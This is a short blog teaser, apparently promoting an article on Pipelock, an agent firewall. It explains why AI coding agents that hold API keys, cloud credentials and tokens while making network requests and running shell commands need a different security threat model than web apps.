The Problem: AI Agents Are Credentialed, Networked, and Trusted
When you run Claude Code, Cursor, or any agentic coding tool, you’re handing it something dangerous: a live environment loaded with secrets. Your ANTHROPIC_API_KEY is sitting there. Your AWS credentials. Your GitHub tokens. Your .env file. The agent can read environment variables, make HTTP requests, call MCP servers, and run shell commands — all on your behalf, all in the same process that holds those credentials.
That’s a completely different threat model than a traditional web app. A web app has a defined interface. You know what it talks to. You can write static firewall rules around it. An agent decides at runtime what to do, what to fetch, and what to send. You can’t fully enumerate the attack surface ahead of time because the whole point of the thing is that it improvises.
Continue reading Pipelock: Agent Firewall for AI Coding Tools

